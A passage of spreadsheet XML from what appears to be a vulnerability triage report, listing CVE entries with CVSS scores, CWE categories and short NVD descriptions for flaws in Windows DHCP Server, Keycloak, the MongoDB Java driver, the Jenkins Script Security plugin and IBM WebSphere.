          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L136" s="5" t="inlineStr"/>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr"/>
      <c r="Q136" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R136" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77494</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77498</t>
        </is>
      </c>
      <c r="D137" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E137" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F137" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K137" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L137" s="5" t="inlineStr"/>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr"/>
      <c r="Q137" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R137" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77498</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77499</t>
        </is>
      </c>
      <c r="D138" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E138" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F138" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K138" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L138" s="5" t="inlineStr"/>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr"/>
      <c r="Q138" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R138" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77499</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77501</t>
        </is>
      </c>
      <c r="D139" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K139" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr"/>
      <c r="Q139" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77501</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77502</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K140" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr"/>
      <c r="Q140" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77502</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77886</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr"/>
      <c r="Q141" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77886</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77888</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K142" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77888</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77889</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K143" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77889</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77890</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77893</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K145" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77895</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K146" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79651</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the theme localization endpoints of the keycloak-services component, which is the core service responsible for authentication flows and theme management in Keycloak. The issue occurs because the system accepts arbitrary locale tags from unauthenticated requests and stores them in a permanent in-memory cache without limits. An attacker can exploit this by sending a large number of unique locale tags, eventually causing the server to run out of memory and crash.</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79651</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88032</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr">
        <is>
          <t>mongodb:java_driver</t>
        </is>
      </c>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>A use-after-free in the reactive client-side encryption component of the MongoDB Java Driver can cause native resources to be freed while an affected encrypted operation is still using them when the operation is cancelled. A party able to cause such an operation to be cancelled may cause the hosting application process to terminate. Reaching the issue requires an affected reactive encryption configuration that retrieves KMS credentials on demand.</t>
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88032</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92128</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier downloads a JAR file specified by URL twice, confirming the approval of the first download and loading the classpath entries from the second, allowing attackers able to define classpath entries to execute arbitrary code in the context of the Jenkins controller JVM.</t>
        </is>
      </c>
      <c r="S149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92128</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92129</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not check calls from sandboxed scripts to methods added dynamically to a class at runtime, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute code outside the sandbox.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92129</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9336</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere</t>
        </is>
      </c>
      <c r="K151" s="5" t="inlineStr">
        <is>
          <t>ibm:websphere_application_server</t>
        </is>
      </c>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a denial of service, caused by sending a specially-crafted HTTP request to an administrative endpoint. A remote attacker could exploit this vulnerability to cause the server to exhaust filesystem space.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9336</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20222</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
